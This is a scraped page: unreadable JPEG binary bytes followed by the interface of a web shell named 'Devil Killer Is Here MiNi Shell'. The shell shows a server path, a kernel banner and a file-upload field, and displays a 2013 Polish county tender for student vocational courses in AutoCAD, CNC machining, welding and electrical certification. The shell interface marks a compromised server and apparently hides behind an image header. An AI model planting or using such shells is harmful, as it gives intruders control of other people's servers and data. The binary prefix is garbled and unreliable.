JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130125/13767-N-2013.html

<p class="kh_header"><b>Mikołów: Zorganizowanie i przeprowadzenie 4 kursów zawodowych wraz z egzaminami  w ramach projektu Kompetencje TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego w latach 2012-2014 realizowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego  współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 13767 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie 4 kursów zawodowych wraz z egzaminami  w ramach projektu Kompetencje TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego w latach 2012-2014 realizowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego  współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem i zakresem zamówienia jest: zorganizowanie i przeprowadzenie 4 kursów zawodowych wraz z egzaminami w latach szkolnych 2012-2013 i 2013-2014:
b) Komputerowe wspomaganie projektowania AutoCAD, 
c) Programowanie i obsługa obrabiarek  sterowanych numerycznie
d)Spawanie metali w zakresie podstawowym 
e)Uprawnienia SEP w zakresie do 1kV
        dla 134 uczniów,uczennic Zespołu Szkół Technicznych w Mikołowie, w ramach projektu 
     Kompetencje  TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego w latach 2012-2014 realizowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego  współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego.
     ZADANIE 1: Przeprowadzenie kursu pn.Komputerowe wspomaganie projektowania AutoCAD wraz z egzaminem.

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu zawodowego pn. Komputerowe wspomaganie projektowania AutoCAD dla 60 uczniów,uczennic Zespołu Szkół Technicznych w Mikołowie, w wymiarze 40 godzin dla każdej z grup w latach szkolnych 2012-2013 i 2013-2014.

a) W szczególności kurs powinien obejmować przygotowanie teoretyczne, przygotowanie praktyczne oraz egzamin wewnętrzny z zakresu komputerowego wspomagania projektowania AutoCAD. 
Liczba uczestników ogółem - 60
Liczba grup ogółem  - 6 
Liczba godzin/grupę - 40 
Liczba godzin ogółem - 240 

godzina = godzina zegarowa
1 grupa zajęciowa = 10 osób 
liczba osób pracujących przy jednym stanowisku podczas zajęć praktycznych = 1 os.

Kurs dla 60 uczestników,uczestniczek zostanie przeprowadzony w dwóch edycjach:
- I edycja w roku szkolnym 2012-2013 obejmuje 3 grupy zajęciowe po 10 osób (łącznie 30 os.)
- II edycja w roku szkolnym 2013-2014 obejmuje 3 grupy zajęciowe po 10 osób (łącznie 30 os.)

b) Zamawiający wymaga, aby program zajęć był realizowany zgodnie z poniższymi wymaganiami:
2.1  Kurs powinien obejmować:
a) przygotowanie teoretyczne w wymiarze 10h na grupę zawierające następujące elementy programu merytorycznego:
- Znormalizowane elementy rysunku technicznego maszynowego.
- Rzuty prostokątne. 
- Widoki i przekroje.
- Rozmieszczenie wymiarów na rysunkach (ogólne zasady).
- Rysowanie części maszyn.
- AutoCAD - tworzenie rysunku prototypowego.
- Warstwy rysunkowe.
- Podstawowe komendy programu AutoCAD.
- Podstawowe elementy rysunku oraz zasady ich tworzenia.
- Zasady rysowania precyzyjnego.
- Edycja tekstu na rysunku.
- Modyfikowanie , kopiowanie  i usuwanie poszczególnych elementów rysunku.
- Zmiana kształtu i wielkości obiektów.
- Edycja cech obiektów.
- Wymiarowanie rysunkowe - wymiary liniowe i kątowe (AutoCAD).
- Definiowanie i wstawianie bloków .
- Wykreślanie rysunku z programu AutoCAD na drukarce.
- Modelowanie w przestrzeni trójwymiarowej.
- Sterowanie układami współrzędnych w układzie 3D.
- Oglądanie rysunku w przestrzeni.
- Modyfikacja obiektów 3D.
- Przygotowanie i eksport pliku z programu CAD do programu CAM.

b) przygotowanie praktyczne w wymiarze 30h na grupę zawierające ćwiczenia praktyczne z następującego zakresu programu merytorycznego:
- Znormalizowane elementy rysunku technicznego maszynowego.
- Rzuty prostokątne. 
- Widoki i przekroje.
- Rozmieszczenie wymiarów na rysunkach (ogólne zasady).
- Rysowanie części maszyn.
- AutoCAD - tworzenie rysunku prototypowego.
- Warstwy rysunkowe.
- Podstawowe komendy programu AutoCAD.
- Podstawowe elementy rysunku oraz zasady ich tworzenia.
- Zasady rysowania precyzyjnego.
- Edycja tekstu na rysunku.
- Modyfikowanie , kopiowanie  i usuwanie poszczególnych elementów rysunku.
- Zmiana kształtu i wielkości obiektów.
- Edycja cech obiektów.
- Wymiarowanie rysunkowe - wymiary liniowe i kątowe (AutoCAD).
- Definiowanie i wstawianie bloków .
- Wykreślanie rysunku z programu AutoCAD na drukarce.
- Modelowanie w przestrzeni trójwymiarowej.
- Sterowanie układami współrzędnych w układzie 3D.
- Oglądanie rysunku w przestrzeni.
- Modyfikacja obiektów 3D.
- Przygotowanie i eksport pliku z programu CAD do programu CAM.

c)  egzamin końcowy. 

2.2 Zajęcia powinny się odbywać:
-   od poniedziałku do soboty
- dla uczniów Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44,w siedzibie Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44, w odpowiednio do charakteru zajęć przystosowanych salach lub odpowiednio wyposażonej pracowni zapewnionej przez Wykonawcę. Zespół Szkół Technicznych w Mikołowie zapewnia  salę wykładową wyposażoną w 10 stanowisk komputerowych, projektor multimedialny oraz tablicę, pozostały sprzęt i oprogramowanie niezbędne do przeprowadzenia kursu w tym program do komputerowego wspomagania projektowania AutoCAD 2011 lub 2012, zapewnia Wykonawca. W przypadku zajęć poza szkołą ucznia, Wykonawca zapewnia transport z siedziby szkoły na zajęcia i z powrotem.

2.3 Wykonawca zobowiązuje się do uzgodnienia z koordynatorem projektu szczegółowego harmonogramu zajęć dla poszczególnych grup w terminie 7 dni przed rozpoczęciem zajęć, natomiast ewentualnych korekt terminów zajęć nie później niż na 5 dni przed terminem zajęć danej grupy po uzyskaniu wcześniejszej akceptacji ze strony uczestników projektu. Harmonogram zajęć powinien być dostosowany do planu lekcji i harmonogramu zajęć dodatkowych w projekcie, a zajęcia na kursie powinny odbywać się w ramach 8 spotkań po 5 h i być wsparte programami multimedialnymi dotyczącymi projektowania AutoCAD.

2.4 Podczas zajęć praktycznych z zakresu komputerowego wspomagania projektowania AutoCAD wymagane jest, aby przy jednym stanowisku znajdował się wyłącznie jeden uczestnik szkolenia.
Wykonawca powinien zapewnić uczestnikom szkolenia odpowiednie wyposażenie techniczne adekwatne do rodzaju szkolenia, odpowiadającego indywidualnym potrzebom szkoleniowym uczestnika.

2.5 Wykonawca zapewni wykwalifikowaną kadrę instruktorską do przeprowadzenia kursu. 

2.6 Wykonawca musi  posiadać uprawnienia do prowadzenia działalności szkoleniowej. 

2.7 Wykonawca zapewni  materiały szkoleniowe w postaci podręcznika lub skryptu  wraz z płytami CD z zakresu projektowania AutoCad (po zakończeniu kursu materiały przechodzą na własność uczniów).
Komplet materiałów szkoleniowych Wykonawca dostarczy uczestnikom szkolenia oraz Zamawiającemu, najpóźniej w dniu rozpoczęcia szkolenia.

2.8 Wykonawca zapewni przeprowadzenie egzaminu oraz wydanie uczestnikom kursu zaświadczenia o ukończeniu kursu i zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych z wyszczególnieniem umiejętności i wiadomości nabytych w trakcie realizacji poszczególnych jednostek szkoleniowych z zakresu objętego kursem. W przypadku egzaminu poza szkołą ucznia, Wykonawca zapewnia transport na egzamin i z powrotem.

2.9.  Termin realizacji:
I edycja - od daty podpisania umowy do 30 czerwca 2013 r.
II edycja - od 1.VII.2013 do 30. IV.2014r. 


ZADANIE 2:  Przeprowadzenie  kursu pn.Programowanie i obsługa obrabiarek  sterowanych numerycznie wraz z egzaminem.

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu pn. Programowanie i obsługa obrabiarek sterowanych numerycznie dla 24 uczniów,uczennic Zespołu Szkół Technicznych w Mikołowie, w wymiarze 60 godzin dla każdej z grup w latach szkolnych 2012-2013 i 2013-2014.

1. W szczególności kurs powinien obejmować przygotowanie teoretyczne, przygotowanie praktyczne oraz egzamin z zakresu programowania i obsługi obrabiarek sterowanych numerycznie. 

Liczba uczestników ogółem - 24
Liczba grup ogółem  - 4 
Liczba godzin/grupę - 60 
Liczba godzin ogółem - 240 

godzina = godzina zegarowa
1 grupa zajęciowa = 6  osób 
liczba osób pracujących przy jednym stanowisku podczas zajęć praktycznych = 1 osoba

Kurs dla 24 uczestników,uczestniczek zostanie przeprowadzony w dwóch edycjach:
- I edycja w roku szkolnym 2012,2013 obejmuje 2 grupy zajęciowe po 6 osób (łącznie 12 os.)
- II edycja w roku szkolnym 2013,2014 obejmuje 2 grupy zajęciowe po 6 osób (łącznie 12 os.)

a) Zamawiający wymaga, aby program zajęć był realizowany zgodnie z poniższymi wymaganiami:

2.1  Kurs powinien obejmować:
a) przygotowanie teoretyczne w wymiarze 20h na grupę zawierające następujące elementy programu merytorycznego:
- Przepisy bhp i ergonomia pracy w zakresie obszaru zawodo­wego CNC i CAD-CAM
- Tokarka sterowana numerycznie - budowa , zasada działania .
- Obróbka skrawaniem i narzędzia skrawające w zakresie obra­biarek CNC.
- Klasyfikacja narzędzi  skrawających.
- Zasady doboru parame­trów skrawania w zależności od rodzaju obróbki i materiałów obrabianych.
- Kompletowanie i czytanie dokumentacji technicznej.
- Czytanie  rysunku technicznego , analiza karty technologicznej.
- Dostosowanie programów operacji technologicznych  do użytkowanej tokarki CNC.
- Czytanie struktury programu z funkcjami określającymi składnię programu CNC.
- Interpolacja liniowa G1 i  G0 - programowanie .
- Interpolacja kołowa G2 i  G3 - programowanie .
- Kompensacja  promienia narzędzia w prawo i lewo od konturu .
- Stała prędkość skrawania .
- Odwołanie stałej prędkości skrawania.
- Wiercenie otworów - programowanie.
- Nacinanie gwintu - programowanie .
- Cykl obróbkowe - programowanie.
- Programowanie funkcji pomocniczych.
- Pomiar wartości korekcyjnych narzędzi i wprowadzenie ustalonych  wartości do sterownika obrabiarki.
- Mocowanie przedmiotu na tokarce.
- Ustalanie punktu zerowego przedmiotu obrabianego .
- Wczytywanie i weryfikacja programu obróbki do sterownika tokarki.
- Obsługa i użytkowanie tokarki sterowanej w systemie CNC.
- Włączenie układów napędowych  i pomoc­niczych .
- Wywołanie i testowanie programu.
- Uruchomienie i nadzór  pracy obrabiarki .
- Praca obrabiarki w systemie automatycznym i półautomatycznym.
- Interpretacja komunikatów i alarmów maszynowych.
- Pomiar kształtu i wymiarów przedmiotu obrabianego.
- Zakończenie pracy obrabiarki i jej zabezpieczenie.

b) przygotowanie praktyczne w wymiarze 40h na grupę zawierające ćwiczenia praktyczne z następującego zakresu programu merytorycznego:
- Tokarka sterowana numerycznie - budowa , zasada działania .
- Obróbka skrawaniem i narzędzia skrawające w zakresie obra­biarek CNC.
- Klasyfikacja narzędzi  skrawających.
- Zasady doboru parame­trów skrawania w zależności od rodzaju obróbki i materiałów obrabianych.
- Dostosowanie programów operacji technologicznych  do użytkowanej tokarki CNC.
- Czytanie struktury programu z funkcjami określającymi składnię programu CNC.
- Interpolacja liniowa G1 i  G0 - programowanie .
- Interpolacja kołowa G2 i  G3 - programowanie .
- Kompensacja  promienia narzędzia w prawo i lewo od konturu.
- Stała prędkość skrawania  .
- Odwołanie stałej prędkości skrawania.
- Wiercenie otworów - programowanie.
- Nacinanie gwintu - programowanie .
- Cykl obróbkowe - programowanie.
- Programowanie funkcji pomocniczych.
- Pomiar wartości korekcyjnych narzędzi i wprowadzenie ustalonych  wartości do sterownika obrabiarki.
- Mocowanie przedmiotu na tokarce.
- Ustalanie punktu zerowego przedmiotu obrabianego .
- Wczytywanie i weryfikacja programu obróbki do sterownika tokarki.
- Obsługa i użytkowanie tokarki sterowanej w systemie CNC.
- Włączenie układów napędowych  i pomoc­niczych .
- Wywołanie i testowanie programu.
- Uruchomienie i nadzór  pracy obrabiarki .
- Praca obrabiarki w systemie automatycznym i półautomatycznym.
- Interpretacja komunikatów i alarmów maszynowych.
- Pomiar kształtu i wymiarów przedmiotu obrabianego.
- Zakończenie pracy obrabiarki i jej zabezpieczenie.

c)  egzamin końcowy. 

2.2 Zajęcia powinny się odbywać:
 -  od poniedziałku do soboty
-dla uczniów Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44;w siedzibie Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44, w odpowiednio do charakteru zajęć przystosowanych salach i lub odpowiednio wyposażonej pracowni zapewnionej przez Wykonawcę. Zespół Szkół Technicznych w Mikołowie zapewnia  salę wykładową wyposażoną w 10 stanowisk komputerowych, projektor multimedialny oraz tablicę. 
-Wykonawca zapewni pozostały sprzęt i oprogramowanie niezbędne do przeprowadzenia kursu tj.
a) obrabiarkę sterowaną numerycznie - dwie osie,
b) układ sterowania  CNC FANUC i SINUMERIK,
c) zestaw podstawowych narzędzi i oprawek do obrabiarki,
d) zestaw  podstawowych narzędzi pomiarowych - suwmiarka, mikrometr,  mikrometr do otworów,
e) program  komputerowy symulacyjny pracę obrabiarek sterowanych numerycznie MTSCNC - 6 stanowisk,
f) program  do komputerowego wspomagania projektowania AutoCAD - min. 1 stanowisko.

W przypadku odbywania części zajęć poza terenem szkoły macierzystej uczestników szkolenia, Wykonawca zobowiązuje się zapewnić transport uczniów Zespołu Szkół Technicznych w Mikołowie z siedziby tej szkoły do miejsca prowadzenia kursu oraz z miejsca prowadzenia kursu do siedziby Zespołu Szkół Technicznych w Mikołowie.

2.3 Wykonawca zobowiązuje się do uzgodnienia z koordynatorem projektu szczegółowego harmonogramu zajęć dla poszczególnych grup w terminie 7 dni przed rozpoczęciem zajęć, natomiast ewentualnych korekt terminów zajęć nie później niż na 5 dni przed terminem zajęć danej grupy po uzyskaniu wcześniejszej akceptacji ze strony uczestników projektu. Harmonogram zajęć powinien być dostosowany do planu lekcji i harmonogramu zajęć dodatkowych w projekcie, a zajęcia na kursie powinny odbywać się w ramach 12 spotkań po 5 h i być wsparte programami multimedialnymi dotyczącymi programowania i obsługi obrabiarek sterowanych numerycznie.

2.4 Podczas zajęć praktycznych z zakresu programowania i obsługi obrabiarek sterowanych numerycznie wymagane jest, aby przy jednym stanowisku znajdował się wyłącznie jeden uczestnik szkolenia. Wykonawca powinien zapewnić uczestnikom szkolenia odpowiednie wyposażenie techniczne adekwatne do rodzaju szkolenia, odpowiadającego indywidualnym potrzebom szkoleniowym uczestnika. Wykonawca zapewni 6 stanowisk na 1 grupę dla każdej grupy zajęciowej.  

2.5 Wykonawca zapewni wykwalifikowaną kadrą instruktorską do przeprowadzenia kursu.

2.6 Wykonawca musi posiadać uprawnienia do  prowadzenia działalności szkoleniowej. 

2.7 Wykonawca zapewni  materiały szkoleniowe w postaci podręcznika lub skryptu  wraz z płytami CD z zakresu programowania i obsługi obrabiarek sterowanych numerycznie (po zakończeniu kursu materiały przechodzą na własność uczniów).
Komplet materiałów szkoleniowych Wykonawca dostarczy uczestnikom szkolenia oraz Zamawiającemu, najpóźniej w dniu rozpoczęcia szkolenia.

2.8 Wykonawca zapewni przeprowadzenie egzaminu oraz wydanie uczestnikom kursu zaświadczenia o ukończeniu kursu i zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych z wyszczególnieniem umiejętności i wiadomości nabytych w trakcie realizacji poszczególnych jednostek szkoleniowych z zakresu objętego kursem. W przypadku egzaminu poza szkołą ucznia, Wykonawca zapewnia transport na egzamin i z powrotem.

2.9.  Termin realizacji:
I edycja - od daty podpisania umowy do 30 czerwca 2013 r.
II edycja - od 1.VII.2013 do 30. IV.2014r. 

ZADANIE 3: Przeprowadzenie kursu spawania metali w zakresie podstawowym wraz z egzaminem.

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu pn. Spawanie metali w zakresie podstawowym dla 20 uczniów,uczennic Zespołu Szkół Technicznych w Mikołowie, w wymiarze 160 godzin dla każdej z grup w latach szkolnych 2012-2013 i 2013-2014. Kurs powinien uwzględniać wymagania  normy PN-EN 287-1 lub PN-EN ISO 9606.  

1. W szczególności kurs powinien obejmować przygotowanie teoretyczne, przygotowanie praktyczne oraz egzamin z zakresu spawania metali w zakresie podstawowym. 

Liczba uczestników ogółem - 20
Liczba grup ogółem  - 4 
Liczba godzin/grupę - 160 
Liczba godzin ogółem - 640 

godzina = godzina zegarowa
1 grupa zajęciowa = 5  osób 
liczba osób pracujących przy jednym stanowisku podczas zajęć praktycznych = 1 osoba

Kurs dla 20 uczestników/uczestniczek zostanie przeprowadzony w dwóch edycjach:
- I edycja w roku szkolnym 2012/2013 obejmuje 2 grupy zajęciowe po 5 osób (łącznie 10 os.)
- II edycja w roku szkolnym 2013/2014 obejmuje 2 grupy zajęciowe po 5 osób (łącznie 10 os.)

2.Zamawiający wymaga, aby program zajęć był realizowany zgodnie z poniższymi wymaganiami:

2.1  Kurs powinien obejmować:
a) przygotowanie teoretyczne w wymiarze 20h/ grupę zawierające następujące elementy programu: 

Lp.
Harmonogram zajęć
Liczba godzin

             Szkolenie teoretyczne

1.
Urządzenia do spawania w osłonach gazów elektrodą topliwą, materiały spawalnicze
2

2.
Możliwości ustawiania parametrów spawania, łuk spawalniczy - rodzaje
1

3.
Zakłócenia w pracy urządzeń spawalniczych, unikanie wad w spoinach
1

4.
Bezpieczeństwo pracy
2

5.
Materiały podstawowe - stale
2

6.
Cięcie termiczne
1

7.
Przygotowanie elementów do spawania, oznakowanie spoin na rysunkach, pozycje spawania
2

8.
Egzamin spawacza wg PN-87 M-69900 01 - 06  oraz PN EN 287-1 i 2
1

9.
Przegląd metod spajania
1

10.
Wady i niezgodności spoin, metody badań połączeń spawanych
1

11.
Naprężenia, skurcz i odkształcenia
1

12.
System szkolenia i egzaminowania spawaczy w Polsce
1

13.
Instruktaż wstępny
4

            
b) przygotowanie praktyczne w wymiarze 120h na grupę zawierające ćwiczenia praktyczne z następującego zakresu:

 

Harmonogram zajęć
Liczba godzin


Ćw. nr 1. - Uruchamianie urządzeń, zajarzanie łuku, regulacja parametrów spawania, próby napawania na blasze w pozycji PA
8


Ćw. nr 2. - Wykonywanie spoin czołowych wielościegowych w pozycji  PA
20


Ćw. nr 3. - Wykonywanie spoin czołowych wielościegowych w pozycji  PC
20


Ćw. nr 4. - Wykonywanie spoin czołowych wielościegowych w pozycji  PF
20


Ćw. nr 5. - Wykonywanie spoin pachwinowych jednościegowych w pozycji  PB
8


Ćw. nr 6. - Wykonywanie spoin pachwinowych jednościegowych w pozycji  PF
8


Ćw. nr 7. - Wykonywanie spoin pachwinowych wielościegowych w pozycji  PB i PF
20


Ćw. nr 8. - Wykonywanie spoin czołowych jednościegowych w pozycji PA
20


Ćw. nr.9. - Powtórka najtrudniejszych ćwiczeń. Przygotowanie złączy próbnych do egzaminu
16


                                                                                                                              
c)  egzamin końcowy - zgłoszenie do egzaminu i przeprowadzenie  egzaminu państwowego w zakresie spawania elektrodą topliwą w osłonie gazów(135) MAG.

2.2 Zajęcia powinny się odbywać:
 -  od poniedziałku do soboty
- w siedzibie Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44, w odpowiednio do charakteru zajęć przystosowanych salach i  lub odpowiednio wyposażonej pracowni zapewnionej przez Wykonawcę. 
- zajęcia teoretyczne  powinny odbywać się w pracowni multimedialnej a zajęcia praktyczne na terenie spawalni (5 niezależnych stanowisk spawalniczych wyposażonych zgodne z wymaganiami norm PN-EN 287-1 lub PN-EN ISO 9606 do metody MAG).  

W przypadku odbywania zajęć poza terenem szkoły macierzystej uczestników szkolenia, Wykonawca zobowiązuje się zapewnić transport uczniów Zespołu Szkół Technicznych w Mikołowie z siedziby tej szkoły do miejsca prowadzenia kursu oraz z miejsca prowadzenia kursu do siedziby Zespołu Szkół Technicznych w Mikołowie.

2.3 Wykonawca zobowiązuje się do uzgodnienia z koordynatorem projektu szczegółowego harmonogramu zajęć dla poszczególnych grup w terminie 7 dni przed rozpoczęciem zajęć, natomiast ewentualnych korekt terminów zajęć nie później niż na 5 dni przed terminem zajęć danej grupy po uzyskaniu wcześniejszej akceptacji ze strony uczestników projektu. Harmonogram zajęć powinien być dostosowany do planu lekcji i harmonogramu zajęć dodatkowych w projekcie.

2.4 Podczas zajęć praktycznych z zakresu spawania w zakresie podstawowym wymagane jest, aby przy jednym stanowisku znajdował się wyłącznie jeden uczestnik szkolenia. Wykonawca powinien zapewnić uczestnikom szkolenia odpowiednie wyposażenie techniczne adekwatne do rodzaju szkolenia, odpowiadającego indywidualnym potrzebom szkoleniowym uczestnika. Wykonawca zapewni 5 stanowisk na 1 grupę dla każdej grupy zajęciowej.  

2.5 Wykonawca zapewni wykwalifikowaną kadrą instruktorską do przeprowadzenia kursu.  

2.6 Wykonawca musi posiadać uprawnienia do  prowadzenia działalności szkoleniowej. 

2.7 Wykonawca zapewni  materiały szkoleniowe w postaci podręcznika lub skryptu  wraz z płytami CD z zakresu spawania w zakresie podstawowym, na których znajdują się przykładowe testy egzaminacyjne (po zakończeniu kursu materiały przechodzą na własność uczniów).
Komplet materiałów szkoleniowych Wykonawca dostarczy uczestnikom szkolenia oraz Zamawiającemu, najpóźniej w dniu rozpoczęcia szkolenia.

2.8 Wykonawca zapewni - materiały do zajęć praktycznych ( próbki do spawania, gaz i drut spawalniczy ) niezbędne do metody MAG.

2.9  Wykonawca zapewni przeprowadzenie egzaminu zgodne z normą europejską  EN 287-1 oraz wydanie uczestnikom kursu zaświadczenia o ukończeniu kursu i zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych z wyszczególnieniem umiejętności i wiadomości nabytych w trakcie realizacji poszczególnych jednostek szkoleniowych z zakresu objętego kursem. W przypadku egzaminu poza szkołą ucznia, Wykonawca zapewnia transport na egzamin i z powrotem.

Wykonawca w szczególności:
- rezerwuje termin egzaminu, 
- pokrywa koszt przygotowania ośrodka do egzaminu (wyposażenie zgodne z wymaganiami norm PN-EN 287-1 lub PN-EN ISO 9606),
- zgłasza uczestników do egzaminu państwowego  i organizuje  przeprowadzenie  egzaminu państwowego w zakresie spawania elektrodą topliwą, pokrywa w całości koszty egzaminu  i ewentualnych poprawek (po 1 ewentualnej poprawce dla każdego uczestnika),
- zapewnia otrzymanie po zdanym egzaminie książeczki  spawacza i świadectwa spawacza wg  norm PN-EN 287-1 lub PN-EN ISO 9606)
